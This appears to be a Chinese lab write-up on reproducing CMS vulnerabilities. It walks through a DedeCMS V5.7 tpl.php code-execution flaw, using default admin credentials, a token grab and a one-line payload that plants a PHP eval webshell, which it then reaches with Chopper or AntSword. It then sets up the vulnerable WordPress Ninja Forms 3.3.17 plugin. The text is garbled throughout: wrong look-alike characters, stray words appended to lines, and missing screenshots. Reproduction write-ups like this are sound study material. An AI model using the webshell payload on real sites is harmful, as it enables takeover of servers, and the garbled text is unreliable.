CMS漏洞复现

漏洞复现-看起来就好难的样子,果真就是这样
复现CMS漏洞的意义是什么呢?
1.从实际操做中了解哪一种CMS有哪一种漏洞,为以后的漏洞挖掘积累经验
2.把作CTF题的经验与实际结合起来,学有所用
3.熟能生巧,练的多了碰到实际状况时才不会无从下手php

什么是CMS?

CMS是“Content Management System”的缩写,意为“内容管理系统”。网站的开发者为了方便,制做了不一样种类的CMS,能够加快网站开发的速度和减小开发的成本。web

常见的CMS:
php类cms系统:dedecms、帝国cms、php16八、phpcms、cmstop、discuz、phpwind等
asp类cms系统:zblog、KingCMS等
国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。shell

怎么复现漏洞?

复现漏洞的第一步就是环境搭建,而后就是找到漏洞点,分析漏洞造成的缘由,实现get shell或者得到其余的权限数据库

DedeCMS-V5.7-UTF8-SP2
先安装好DEDECMS
1.
在这里插入图片描述2.
在这里插入图片描述3.
在这里插入图片描述4.
在这里插入图片描述
这个环境就搭好了,这个漏洞属于后台漏洞。先登陆进去,DeDeCMS默认后台路径是/uploads/dede,
帐户密码默认都是admin
在这里插入图片描述
已知在tpl.php存在代码执行漏洞,咱们在本地的phpstudy的WWW文件中搜索tpl.php框架

在这里插入图片描述tpl.php里面有代码执行漏洞,涉及到代码审计–这方面挺难。下面咱们来找到tpl.php中存在漏洞的地方,咱们再去tpl.php里看一下,发现action的参数有不少,比del,edit,upload等等,但只有传入upload的时候页面才会回显正常,而其余的都会显示token异常,因此只能经过action=upload来获取token,查看页面源代码
在这里插入图片描述
而后访问http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/tpl.php?action=upload
在这里插入图片描述
查看源代码,看到一个token值
在这里插入图片描述
因此构造payload以下
域名+/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['abc'])?>
发现成功写入
在这里插入图片描述而后咱们就能够用菜刀或者蚁剑进行链接
首先咱们要找到这个名为abc的php文件查看地址
![在这里插入图片描述](https://img-blog.csdnimg.cn/20190721222402507.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjEzMTQ0,size_16,color
地址后面写的就是咱们所写的那句话中POST里面的
在这里插入图片描述
这就ok了,能够查看各个目录也能进行删改
在这里插入图片描述svg

Wordpress (CVE-2018-19287)
漏洞简介
这个漏洞是基于Ninja Forms 3.3.17插件上的漏洞,Ninja Forms是WordPress的终极免费表单建立工具wordpress

环境搭建
先去官网下载相应版本的wordpress,网址:https://cn.wordpress.org/download/releases/
这里咱们下载4.4版本。
一样的还要下载对应版本的插件,网址:https://downloads.wordpress.org/plugin/ninja-forms.3.3.17.zip
下载完后要把插件解压到/wp-content/plugins目录下,里面存放的都是wp的插件。
须要本身添加一个数据库来存放数据,在命令行里面使用命令CREATE DATABASE 数据库名;
或者也能够用本来存在的数据库test也能够工具

在这里插入图片描述进入wordpress
在这里插入图片描述
提交之后
在这里插入图片描述网站

在这里插入图片描述
进入之后
在这里插入图片描述插件

点击启用。
至此 ,就完成了这个框架的使用
在这里插入图片描述